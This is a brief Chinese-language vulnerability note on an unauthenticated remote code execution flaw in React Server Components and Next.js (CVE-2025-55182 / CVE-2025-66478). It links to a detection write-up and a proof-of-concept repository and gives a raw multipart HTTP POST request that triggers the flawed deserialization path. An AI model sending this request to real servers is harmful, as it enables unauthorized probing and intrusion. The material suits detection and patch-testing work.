漏洞描述
React ServerComponents在处理ReplyFlightStream的反序列化数据时缺乏必要校验,攻击者可构造任意模型字段、循环结构、ServerReference与multipart/form-data,诱使解析流程进入异常路径并触发模块加载与引用执行链,最终导致未授权代码执行。
https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478/
https://github.com/msanft/CVE-2025-55182
POST / HTTP/1.1
Host:
Next-Action: x
X-Nextjs-Request-Id: b6dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
{}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
["$1:a:a"]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--